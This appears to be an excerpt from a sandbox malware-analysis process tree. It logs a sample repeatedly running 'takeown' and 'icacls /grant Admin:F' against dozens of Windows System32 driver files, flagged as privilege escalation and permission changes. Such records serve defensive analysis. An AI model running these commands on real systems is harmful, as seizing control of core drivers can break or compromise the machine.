C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\Diskdump.sys3⤵
- Possible privilege escalation attempt
- Suspicious use of AdjustPrivilegeToken
PID:3224
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\Diskdump.sys /grant "Admin:F"3⤵PID:3680
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\dmvsc.sys && icacls C:\Windows\System32\drivers\dmvsc.sys /grant "%username%:F" && exit2⤵PID:2796
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\dmvsc.sys3⤵PID:3320
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\dmvsc.sys /grant "Admin:F"3⤵
- Modifies file permissions
PID:3576
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\drmk.sys && icacls C:\Windows\System32\drivers\drmk.sys /grant "%username%:F" && exit2⤵PID:3136
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\drmk.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3448
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\drmk.sys /grant "Admin:F"3⤵PID:3708
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\drmkaud.sys && icacls C:\Windows\System32\drivers\drmkaud.sys /grant "%username%:F" && exit2⤵PID:3432
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\drmkaud.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3696
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\drmkaud.sys /grant "Admin:F"3⤵PID:3636
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\Dumpata.sys && icacls C:\Windows\System32\drivers\Dumpata.sys /grant "%username%:F" && exit2⤵PID:3356
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\Dumpata.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3552
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\Dumpata.sys /grant "Admin:F"3⤵PID:3836
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\dumpfve.sys && icacls C:\Windows\System32\drivers\dumpfve.sys /grant "%username%:F" && exit2⤵PID:3200
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\dumpfve.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3764
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\dumpfve.sys /grant "Admin:F"3⤵
- Modifies file permissions
PID:4076
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\dxapi.sys && icacls C:\Windows\System32\drivers\dxapi.sys /grant "%username%:F" && exit2⤵PID:3740
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\dxapi.sys3⤵
- Possible privilege escalation attempt
- Suspicious use of AdjustPrivilegeToken
PID:3944
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\dxapi.sys /grant "Admin:F"3⤵PID:3980
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\dxg.sys && icacls C:\Windows\System32\drivers\dxg.sys /grant "%username%:F" && exit2⤵PID:3784
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\dxg.sys3⤵
- Possible privilege escalation attempt
- Suspicious use of AdjustPrivilegeToken
PID:3840
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\dxg.sys /grant "Admin:F"3⤵PID:3876
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\dxgkrnl.sys && icacls C:\Windows\System32\drivers\dxgkrnl.sys /grant "%username%:F" && exit2⤵PID:3632
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\dxgkrnl.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3924
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\dxgkrnl.sys /grant "Admin:F"3⤵PID:3112
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\dxgmms1.sys && icacls C:\Windows\System32\drivers\dxgmms1.sys /grant "%username%:F" && exit2⤵PID:3872
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\dxgmms1.sys3⤵
- Possible privilege escalation attempt
- Suspicious use of AdjustPrivilegeToken
PID:3940
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\dxgmms1.sys /grant "Admin:F"3⤵PID:3124
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\elxstor.sys && icacls C:\Windows\System32\drivers\elxstor.sys /grant "%username%:F" && exit2⤵PID:3928
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\elxstor.sys3⤵
- Possible privilege escalation attempt
PID:4056
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\elxstor.sys /grant "Admin:F"3⤵PID:4000
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\errdev.sys && icacls C:\Windows\System32\drivers\errdev.sys /grant "%username%:F" && exit2⤵PID:3968
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\errdev.sys3⤵PID:2528
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\errdev.sys /grant "Admin:F"3⤵PID:3480
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\evbda.sys && icacls C:\Windows\System32\drivers\evbda.sys /grant "%username%:F" && exit2⤵PID:4008
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\evbda.sys3⤵PID:3276
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\evbda.sys /grant "Admin:F"3⤵
- Possible privilege escalation attempt
PID:1444
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\exfat.sys && icacls C:\Windows\System32\drivers\exfat.sys /grant "%username%:F" && exit2⤵PID:2116
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\exfat.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3328
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\exfat.sys /grant "Admin:F"3⤵
- Modifies file permissions
PID:3188
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\fastfat.sys && icacls C:\Windows\System32\drivers\fastfat.sys /grant "%username%:F" && exit2⤵PID:936
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\fastfat.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3428
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\fastfat.sys /grant "Admin:F"3⤵PID:2412
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\fdc.sys && icacls C:\Windows\System32\drivers\fdc.sys /grant "%username%:F" && exit2⤵PID:3228
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\fdc.sys3⤵PID:3576
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\fdc.sys /grant "Admin:F"3⤵PID:3676
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\fileinfo.sys && icacls C:\Windows\System32\drivers\fileinfo.sys /grant "%username%:F" && exit2⤵PID:3320
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\fileinfo.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3420
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\fileinfo.sys /grant "Admin:F"3⤵PID:3588
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\filetrace.sys && icacls C:\Windows\System32\drivers\filetrace.sys /grant "%username%:F" && exit2⤵PID:3128
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\filetrace.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3572
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\filetrace.sys /grant "Admin:F"3⤵PID:3892
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\flpydisk.sys && icacls C:\Windows\System32\drivers\flpydisk.sys /grant "%username%:F" && exit2⤵PID:2288
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\flpydisk.sys3⤵PID:3832
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\flpydisk.sys /grant "Admin:F"3⤵PID:3988
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\fltMgr.sys && icacls C:\Windows\System32\drivers\fltMgr.sys /grant "%username%:F" && exit2⤵PID:3140
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\fltMgr.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3768
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\fltMgr.sys /grant "Admin:F"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3756
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\fsdepends.sys && icacls C:\Windows\System32\drivers\fsdepends.sys /grant "%username%:F" && exit2⤵PID:392
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\fsdepends.sys3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:3828
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\fsdepends.sys /grant "Admin:F"3⤵PID:3276
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\fs_rec.sys && icacls C:\Windows\System32\drivers\fs_rec.sys /grant "%username%:F" && exit2⤵PID:3636
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\fs_rec.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3924
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\fs_rec.sys /grant "Admin:F"3⤵PID:2484
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\fvevol.sys && icacls C:\Windows\System32\drivers\fvevol.sys /grant "%username%:F" && exit2⤵PID:3664
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\fvevol.sys3⤵
- Possible privilege escalation attempt
- Suspicious use of AdjustPrivilegeToken
PID:3628
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\fvevol.sys /grant "Admin:F"3⤵PID:2140
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\FWPKCLNT.SYS && icacls C:\Windows\System32\drivers\FWPKCLNT.SYS /grant "%username%:F" && exit2⤵PID:3836
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\FWPKCLNT.SYS3⤵
- Possible privilege escalation attempt
- Suspicious use of AdjustPrivilegeToken
PID:3700
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\FWPKCLNT.SYS /grant "Admin:F"3⤵PID:3624
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\GAGP30KX.SYS && icacls C:\Windows\System32\drivers\GAGP30KX.SYS /grant "%username%:F" && exit2⤵PID:3548
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\GAGP30KX.SYS3⤵PID:3568
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\GAGP30KX.SYS /grant "Admin:F"3⤵PID:3852
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\gm.dls && icacls C:\Windows\System32\drivers\gm.dls /grant "%username%:F" && exit2⤵PID:3896
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\gm.dls3⤵
- Suspicious use of AdjustPrivilegeToken
PID:112
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\gm.dls /grant "Admin:F"3⤵PID:3352
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\gmreadme.txt && icacls C:\Windows\System32\drivers\gmreadme.txt /grant "%username%:F" && exit2⤵PID:3516
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\gmreadme.txt3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3476
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\gmreadme.txt /grant "Admin:F"3⤵
- Modifies file permissions
PID:4040
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\hcw85cir.sys && icacls C:\Windows\System32\drivers\hcw85cir.sys /grant "%username%:F" && exit2⤵PID:3844
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\hcw85cir.sys3⤵
- Modifies file permissions
PID:3232
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\hcw85cir.sys /grant "Admin:F"3⤵PID:2588
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\hdaudbus.sys && icacls C:\Windows\System32\drivers\hdaudbus.sys /grant "%username%:F" && exit2⤵PID:3396
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\hdaudbus.sys3⤵PID:3424
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\hdaudbus.sys /grant "Admin:F"3⤵PID:3996
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\HdAudio.sys && icacls C:\Windows\System32\drivers\HdAudio.sys /grant "%username%:F" && exit2⤵PID:4024
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\HdAudio.sys3⤵PID:3572
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\HdAudio.sys /grant "Admin:F"3⤵PID:4012
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\hidbatt.sys && icacls C:\Windows\System32\drivers\hidbatt.sys /grant "%username%:F" && exit2⤵PID:3224
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\hidbatt.sys3⤵PID:3944
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\hidbatt.sys /grant "Admin:F"3⤵PID:3452
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\hidbth.sys && icacls C:\Windows\System32\drivers\hidbth.sys /grant "%username%:F" && exit2⤵PID:3676
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\hidbth.sys3⤵PID:3332
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\hidbth.sys /grant "Admin:F"3⤵PID:3980
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\hidclass.sys && icacls C:\Windows\System32\drivers\hidclass.sys /grant "%username%:F" && exit2⤵PID:3220
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\hidclass.sys3⤵PID:3756
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\hidclass.sys /grant "Admin:F"3⤵PID:3528
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\hidir.sys && icacls C:\Windows\System32\drivers\hidir.sys /grant "%username%:F" && exit2⤵PID:3280
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\hidir.sys3⤵PID:3712
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\hidir.sys /grant "Admin:F"3⤵PID:3296
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\hidparse.sys && icacls C:\Windows\System32\drivers\hidparse.sys /grant "%username%:F" && exit2⤵PID:3616
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\hidparse.sys3⤵
- Modifies file permissions
PID:3688
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\hidparse.sys /grant "Admin:F"3⤵PID:3416
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\hidusb.sys && icacls C:\Windows\System32\drivers\hidusb.sys /grant "%username%:F" && exit2⤵PID:3736
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\hidusb.sys3⤵PID:3596
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\hidusb.sys /grant "Admin:F"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2484
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\HpSAMD.sys && icacls C:\Windows\System32\drivers\HpSAMD.sys /grant "%username%:F" && exit2⤵PID:3600
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\HpSAMD.sys3⤵PID:3380
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\HpSAMD.sys /grant "Admin:F"3⤵PID:4072
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\http.sys && icacls C:\Windows\System32\drivers\http.sys /grant "%username%:F" && exit2⤵PID:3084
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\http.sys3⤵
- Possible privilege escalation attempt
PID:3100
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\http.sys /grant "Admin:F"3⤵PID:3436
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\hwpolicy.sys && icacls C:\Windows\System32\drivers\hwpolicy.sys /grant "%username%:F" && exit2⤵PID:3504
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\hwpolicy.sys3⤵PID:3944
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\hwpolicy.sys /grant "Admin:F"3⤵PID:3096
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\i8042prt.sys && icacls C:\Windows\System32\drivers\i8042prt.sys /grant "%username%:F" && exit2⤵PID:3480
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\i8042prt.sys3⤵PID:3768
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\i8042prt.sys /grant "Admin:F"3⤵PID:4012
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\iaStorV.sys && icacls C:\Windows\System32\drivers\iaStorV.sys /grant "%username%:F" && exit2⤵PID:3620
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\iaStorV.sys3⤵PID:3428
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\iaStorV.sys /grant "Admin:F"3⤵PID:3988
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\iirsp.sys && icacls C:\Windows\System32\drivers\iirsp.sys /grant "%username%:F" && exit2⤵PID:2316
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\iirsp.sys3⤵PID:3728
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\iirsp.sys /grant "Admin:F"3⤵PID:3576
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\intelide.sys && icacls C:\Windows\System32\drivers\intelide.sys /grant "%username%:F" && exit2⤵PID:3812
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\intelide.sys3⤵PID:3448
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\intelide.sys /grant "Admin:F"3⤵
- Modifies file permissions
PID:2528
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\intelppm.sys && icacls C:\Windows\System32\drivers\intelppm.sys /grant "%username%:F" && exit2⤵PID:3572
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\intelppm.sys3⤵PID:3756
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\intelppm.sys /grant "Admin:F"3⤵PID:3588
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ipfltdrv.sys && icacls C:\Windows\System32\drivers\ipfltdrv.sys /grant "%username%:F" && exit2⤵PID:3748
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\ipfltdrv.sys3⤵PID:3688
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\ipfltdrv.sys /grant "Admin:F"3⤵PID:3604
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\IPMIDrv.sys && icacls C:\Windows\System32\drivers\IPMIDrv.sys /grant "%username%:F" && exit2⤵PID:3120
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\IPMIDrv.sys3⤵
- Possible privilege escalation attempt
PID:3924
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\IPMIDrv.sys /grant "Admin:F"3⤵PID:3832
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ipnat.sys && icacls C:\Windows\System32\drivers\ipnat.sys /grant "%username%:F" && exit2⤵PID:3680
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\ipnat.sys3⤵
- Possible privilege escalation attempt
PID:3596
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\ipnat.sys /grant "Admin:F"3⤵PID:3508
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\irda.sys && icacls C:\Windows\System32\drivers\irda.sys /grant "%username%:F" && exit2⤵PID:564
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\irda.sys3⤵PID:3768
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\irda.sys /grant "Admin:F"3⤵PID:4012
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\irenum.sys && icacls C:\Windows\System32\drivers\irenum.sys /grant "%username%:F" && exit2⤵PID:4036
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\irenum.sys3⤵PID:3292
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\irenum.sys /grant "Admin:F"3⤵
- Modifies file permissions
PID:3728
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\isapnp.sys && icacls C:\Windows\System32\drivers\isapnp.sys /grant "%username%:F" && exit2⤵PID:3112
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\isapnp.sys3⤵PID:3164
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\isapnp.sys /grant "Admin:F"3⤵
- Possible privilege escalation attempt
PID:3920
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\kbdclass.sys && icacls C:\Windows\System32\drivers\kbdclass.sys /grant "%username%:F" && exit2⤵PID:3100
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\kbdclass.sys3⤵PID:3744
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\kbdclass.sys /grant "Admin:F"3⤵PID:3924
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\kbdhid.sys && icacls C:\Windows\System32\drivers\kbdhid.sys /grant "%username%:F" && exit2⤵PID:3696
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\kbdhid.sys3⤵
- Possible privilege escalation attempt
PID:1396
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\kbdhid.sys /grant "Admin:F"3⤵PID:4028
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ks.sys && icacls C:\Windows\System32\drivers\ks.sys /grant "%username%:F" && exit2⤵PID:3284
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\ks.sys3⤵PID:3368
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\ks.sys /grant "Admin:F"3⤵
- Modifies file permissions
PID:3688
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ksecdd.sys && icacls C:\Windows\System32\drivers\ksecdd.sys /grant "%username%:F" && exit2⤵PID:3948
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\ksecdd.sys3⤵PID:3340
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\ksecdd.sys /grant "Admin:F"3⤵
- Modifies file permissions
PID:3724
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ksecpkg.sys && icacls C:\Windows\System32\drivers\ksecpkg.sys /grant "%username%:F" && exit2⤵PID:4040
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\ksecpkg.sys3⤵PID:3332
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\ksecpkg.sys /grant "Admin:F"3⤵PID:3368
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ksthunk.sys && icacls C:\Windows\System32\drivers\ksthunk.sys /grant "%username%:F" && exit2⤵PID:2528
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\ksthunk.sys3⤵
- Possible privilege escalation attempt
PID:3832
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\ksthunk.sys /grant "Admin:F"3⤵PID:3428
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\lltdio.sys && icacls C:\Windows\System32\drivers\lltdio.sys /grant "%username%:F" && exit2⤵PID:3308
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\lltdio.sys3⤵PID:3420
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\lltdio.sys /grant "Admin:F"3⤵PID:3404
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\lsi_fc.sys && icacls C:\Windows\System32\drivers\lsi_fc.sys /grant "%username%:F" && exit2⤵PID:3464
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\lsi_fc.sys3⤵PID:3232
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\lsi_fc.sys /grant "Admin:F"3⤵PID:1444
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\lsi_sas.sys && icacls C:\Windows\System32\drivers\lsi_sas.sys /grant "%username%:F" && exit2⤵PID:3476
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\lsi_sas.sys3⤵PID:3800
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\lsi_sas.sys /grant "Admin:F"3⤵PID:3852
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\lsi_sas2.sys && icacls C:\Windows\System32\drivers\lsi_sas2.sys /grant "%username%:F" && exit2⤵PID:4012
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\lsi_sas2.sys3⤵
- Modifies file permissions
PID:3792
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\lsi_sas2.sys /grant "Admin:F"3⤵PID:2560
-
-
-
